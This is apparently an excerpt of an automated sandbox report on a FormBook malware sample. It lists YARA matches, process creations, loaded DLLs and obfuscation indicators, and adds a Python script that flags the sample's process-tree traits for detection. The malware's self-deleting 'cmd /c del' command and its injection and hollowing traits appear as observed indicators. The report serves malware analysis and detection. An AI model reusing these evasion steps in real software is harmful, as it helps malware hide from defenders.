               Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
               Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
               Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
               Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
               Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
               Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
               Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
               Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
               Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
               Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
               Source: Process Memory Space: AB2hQJZ77ipdWem.exe PID: 7408, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
               Source: Process Memory Space: AB2hQJZ77ipdWem.exe PID: 7576, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
               Source: Process Memory Space: cscript.exe PID: 7720, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
               Source: AB2hQJZ77ipdWem.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
               Source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | Cryptographic APIs: 'CreateDecryptor'
               Source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | Cryptographic APIs: 'CreateDecryptor'
               Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, fQsIIlXm3Yrb2eUDWF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
               Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, L2MZqe5X1hqSn78nu9.cs | Security API names: _0020.SetAccessControl
               Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, L2MZqe5X1hqSn78nu9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
               Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, L2MZqe5X1hqSn78nu9.cs | Security API names: _0020.AddAccessRule
               Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, L2MZqe5X1hqSn78nu9.cs | Security API names: _0020.SetAccessControl
               Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, L2MZqe5X1hqSn78nu9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
               Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, L2MZqe5X1hqSn78nu9.cs | Security API names: _0020.AddAccessRule
               Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, L2MZqe5X1hqSn78nu9.cs | Security API names: _0020.SetAccessControl
               Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, L2MZqe5X1hqSn78nu9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
               Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, L2MZqe5X1hqSn78nu9.cs | Security API names: _0020.AddAccessRule
               Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, fQsIIlXm3Yrb2eUDWF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
               Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, fQsIIlXm3Yrb2eUDWF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
               Source: 0.2.AB2hQJZ77ipdWem.exe.318c9d8.3.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
               Source: 0.2.AB2hQJZ77ipdWem.exe.7830000.8.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
               Source: 0.2.AB2hQJZ77ipdWem.exe.31ad0d4.2.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
               Source: classification engine | Classification label: mal100.troj.evad.winEXE@267/1@11/6
               Source: C:\Windows\SysWOW64\cscript.exe | Code function: 5_2_0062BCDF FormatMessageW,SysAllocString,LocalFree,GetLastError,WideCharToMultiByte,__alloca_probe_16,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,LocalFree
               Source: C:\Windows\SysWOW64\cscript.exe | Code function: 5_2_006264E0 CLSIDFromString,CoCreateInstance
               Source: C:\Windows\SysWOW64\cscript.exe | Code function: 5_2_006382B5 FindResourceExW,LoadResource
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AB2hQJZ77ipdWem.exe.log
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Mutant created: NULL
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
               Source: AB2hQJZ77ipdWem.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
               Source: AB2hQJZ77ipdWem.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
               Source: AB2hQJZ77ipdWem.exe | ReversingLabs: Detection: 65%
               Source: unknown | Process created: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Process created: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
               Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
               Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
               Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
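The process tree above is the part of this report that transfers most directly to endpoint detection. Three traits stand out: the sample starts a second copy of itself with an identical command line (the child that later matches the FormBook rules, consistent with "Sample uses process hollowing technique"); explorer.exe, not the sample, starts cscript.exe from SysWOW64 with no script argument at all, which is never what a legitimate cscript.exe invocation looks like; and that cscript.exe then runs cmd.exe /c del against the original sample path to remove the dropper. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses constructed copies of those "Process created" lines (the same fields Sysmon event 1 or an EDR would give as ParentImage, Image and CommandLine) and flags each trait. The sample path is a parameter because the self-delete check is only meaningful against the file actually submitted; the parser tolerates both the separated and the fused "explorer.exeProcess created" column form.

```python
import re

# Constructed from the report's "Process created" lines (sample input for this
# example, not a Joe Sandbox export; link residue dropped).
PROCESS_LINES = [
    r'Source: unknown | Process created: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"',
    r'Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Process created: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"',
    r'Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"',
    r'Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"',
    r'Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
]

# parent = everything between "Source:" and "Process created:", with or
# without a " | " separator; image = first token of the child; cmdline = rest.
LINE_RE = re.compile(
    r"Source:\s+(?P<parent>.+?)\s*\|?\s*Process created:\s+(?P<image>\S+)(?:\s+(?P<cmdline>.*))?$"
)
# "/c del <path>" with or without quotes around the path.
DEL_RE = re.compile(r'/c\s+del\s+"?(?P<target>[^"]+?)"?\s*$', re.IGNORECASE)


def parse_edges(lines):
    """Return (parent_path, child_image, child_cmdline) tuples; paths lower-cased."""
    edges = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a process-creation line
        edges.append((m.group("parent").strip().lower(),
                      m.group("image").lower(),
                      (m.group("cmdline") or "").strip()))
    return edges


def basename(path):
    return path.rsplit("\\", 1)[-1]


def find_formbook_chain(edges, sample_path):
    """Flag the process-tree traits visible in this report.

    Returns a sorted list of finding names; an empty list means nothing matched.
    """
    sample = sample_path.lower()
    findings = set()

    # 1. The sample re-launches its own image with an identical command line,
    #    the usual shape of a hollowed child process.
    for parent, image, _ in edges:
        if parent == sample and image == sample:
            findings.add("self_spawn_identical_cmdline")

    # 2. explorer.exe starts a 32-bit system binary whose command line is only
    #    its own path: cscript.exe with no script to run has no legitimate job.
    hosts = set()
    for parent, image, cmdline in edges:
        bare = cmdline.strip('"').lower() == image
        if basename(parent) == "explorer.exe" and "\\syswow64\\" in image and bare:
            hosts.add(image)
            findings.add("explorer_spawns_bare_syswow64_host")

    # 3. That host then runs "cmd.exe /c del" against the original sample path.
    for parent, image, cmdline in edges:
        if parent in hosts and basename(image) == "cmd.exe":
            m = DEL_RE.search(cmdline)
            if m and m.group("target").lower() == sample:
                findings.add("host_deletes_original_sample")

    return sorted(findings)


if __name__ == "__main__":
    submitted = r"C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
    for name in find_formbook_chain(parse_edges(PROCESS_LINES), submitted):
        print("FLAG:", name)
```

Trait 2 on its own is the cheapest hunting query to carry over to Sysmon or EDR telemetry: explorer.exe as parent, a SysWOW64 image, and a command line equal to the image path. Trait 3 (a system binary deleting a user-profile executable it did not create) is a strong confirmation when it follows within seconds. Neither check needs the FormBook name; the report's YARA hits just explain why the tree looks this way.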
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: mscoree.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: apphelp.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: kernel.appcore.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: version.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: vcruntime140_clr0400.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: ucrtbase_clr0400.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: ucrtbase_clr0400.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: uxtheme.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: windows.storage.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: wldp.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: profapi.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: cryptsp.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: rsaenh.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: cryptbase.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: dwrite.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: amsi.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: userenv.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: msasn1.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: gpapi.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Section loaded: windowscodecs.dll
               Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
               Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
               Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
               Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
               Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
               Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
               Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
               Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: version.dll
               Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: wininet.dll
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
               Source: AB2hQJZ77ipdWem.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
               Source: AB2hQJZ77ipdWem.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: cscript.pdbUGP source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453363872.0000000001050000.00000040.10000000.00040000.00000000.sdmp, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453117705.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1455290372.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1453154291.0000000004801000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: AB2hQJZ77ipdWem.exe, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000005.00000003.1455290372.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1453154291.0000000004801000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: cscript.pdb source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453363872.0000000001050000.00000040.10000000.00040000.00000000.sdmp, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453117705.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp

              Data Obfuscation

              Source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, L2MZqe5X1hqSn78nu9.cs .Net Code: WKA5gMpHji System.Reflection.Assembly.Load(byte[])
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, L2MZqe5X1hqSn78nu9.cs .Net Code: WKA5gMpHji System.Reflection.Assembly.Load(byte[])
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, L2MZqe5X1hqSn78nu9.cs .Net Code: WKA5gMpHji System.Reflection.Assembly.Load(byte[])
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_0062AA82 LoadLibraryW,GetProcAddress,FreeLibrary, 5_2_0062AA82
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 0_2_02F9BD62 push eax; retf 0_2_02F9BF59
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_0041EA56 push esp; ret 3_2_0041EA51
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_0041D56C push eax; ret 3_2_0041D572
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_0041D502 push eax; ret 3_2_0041D508
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_0041D50B push eax; ret 3_2_0041D572
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_004176C3 push FCC6ED37h; retf 3_2_004176D5
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_00417782 push ds; ret 3_2_00417786
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_0041CF88 push ecx; ret 3_2_0041CF89
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_0109225F pushad ; ret 3_2_010927F9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_010927FA pushad ; ret 3_2_010927F9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_010C09AD push ecx; mov dword ptr [esp], ecx 3_2_010C09B6
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_0109283D push eax; iretd 3_2_01092858
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_01091344 push eax; iretd 3_2_01091369
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_01099939 push es; iretd 3_2_01099940
              Source: C:\Windows\explorer.exe Code function: 4_2_0E057B02 push esp; retn 0000h 4_2_0E057B03
              Source: C:\Windows\explorer.exe Code function: 4_2_0E057B1E push esp; retn 0000h 4_2_0E057B1F
              Source: C:\Windows\explorer.exe Code function: 4_2_0E0579B5 push esp; retn 0000h 4_2_0E057AE7
              Source: C:\Windows\explorer.exe Code function: 4_2_10EB49B5 push esp; retn 0000h 4_2_10EB4AE7
              Source: C:\Windows\explorer.exe Code function: 4_2_10EB4B02 push esp; retn 0000h 4_2_10EB4B03
              Source: C:\Windows\explorer.exe Code function: 4_2_10EB4B1E push esp; retn 0000h 4_2_10EB4B1F
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_0062DF11 push ecx; ret 5_2_0062DF24
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_04B627FA pushad ; ret 5_2_04B627F9
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_04B6225F pushad ; ret 5_2_04B627F9
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_04B6283D push eax; iretd 5_2_04B62858
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_04B909AD push ecx; mov dword ptr [esp], ecx 5_2_04B909B6
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_027C76C3 push FCC6ED37h; retf 5_2_027C76D5
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_027C7782 push ds; ret 5_2_027C7786
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_027CD4B5 push eax; ret 5_2_027CD508
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_027CD56C push eax; ret 5_2_027CD572
              Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_027CD50B push eax; ret 5_2_027CD572
              Source: AB2hQJZ77ipdWem.exe Static PE information: section name: .text entropy: 7.981823321678096
              Source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.cs High entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
              Source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, NkEtj4xdihRGcDPjVY.cs High entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, A84fLPSIsCr4pNr2e1.cs High entropy of concatenated method names: 'CqZw6peOhm', 'h1NwdADq3d', 'kWdwgNtrr6', 'tKZwb49V96', 'TDGw0B3Qdo', 'LOewkZkmgP', 'ra4wxwQchy', 'SLewmQL4wR', 'b5KwMJXskU', 'ocHwJY6SVD'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, HxZ91e2qtRrpVHMmHE.cs High entropy of concatenated method names: 'JvnY22v44Q', 'TfyY8GdUjx', 'cipcAcUgVM', 'bJMcHogVH2', 'WyLYh4DXo0', 'ArEY1Lxfc2', 'rVNYQyA8Yf', 'LJLYphIsE6', 'iReYS5y7WR', 'wcgYOOMoiI'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, NByB4dfTi3kR926o21.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LORUajo9pN', 'nrJU8V4K0Q', 'xAMUzO6UGU', 'ieDlApofjr', 'YhylHKFY4A', 'kUYlU7dwQK', 'S33llmTWk8', 'LWWWSfiQgQOmjK7YI4v'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, yFkgMbnRXbdivPfDnN.cs High entropy of concatenated method names: 'fXwcDiSmwy', 'RoocCmVKfm', 'dEhcobuAXj', 'giscy5PCA6', 'gD1cIoMu18', 'moncw3GYoS', 'MWrcZIjBpA', 'k79cVKkSEp', 'F7pcBw8mfL', 'RdMcuUBj5d'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, xxcXVGtMuD6epI0GiVX.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D3rPp7pLnQ', 'CXRPS8MRun', 'L4dPOWF8fF', 'QVDPjSYdFU', 'ocXPX09tlX', 'Y3RPLU0xqI', 'e3dP38nnfU'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, lD2VpmLwy74UUFOu8Q.cs High entropy of concatenated method names: 'zBlIex2kgA', 'TTkICLn9DY', 'd5lIyBkFPG', 'nT5IwTxQZD', 'fHtIZx4k1j', 'l7qyXvwF1t', 'PGUyLqH89g', 'QLuy38NPXM', 'HMuy2VcCdq', 'BI5yaHP11i'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, LbokTxtwlaCQP5t1Y5j.cs High entropy of concatenated method names: 'S3it6vBg5B', 'tJctdRrX3S', 'QW0tgc8Inr', 'URQtbg3XE7', 'enlt01JULC', 'UT7tkkyNuM', 'zawtxrUOQ0', 'Jottmcx0vk', 'tJqtM4nx1u', 'OjFtJKELUR'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, oDbClXHY0rOWGmbvPY.cs High entropy of concatenated method names: 'HPWwDrRFWb', 'iFawoXTHEO', 'zdewIAQtPG', 'MeQI8e8rFH', 'BmKIzethpY', 'LWJwATbDpJ', 'gD3wHMVGsI', 'hwTwUqKga7', 'dGJwl0gbRu', 'gJGw5AVq9s'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, fQsIIlXm3Yrb2eUDWF.cs High entropy of concatenated method names: 'zlNCpIs07c', 'Ex0CSYgWDB', 'eCHCOlupMr', 'FcYCj8nsVG', 'cu0CXYg4jb', 'zX6CL2R0pq', 'e0mC3dNydv', 'R1bC2umg2C', 'jiCCa0HSsm', 'mn8C8moeUO'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, GEAuDLzPxjeVJtEtEV.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oVrt9BkpYt', 'GgrtseS0Z4', 'Ae9tFE8YS0', 'PbTtYjNOlk', 'B4GtciECjo', 'qCltt0d9Hi', 'O6RtPOoLKp'
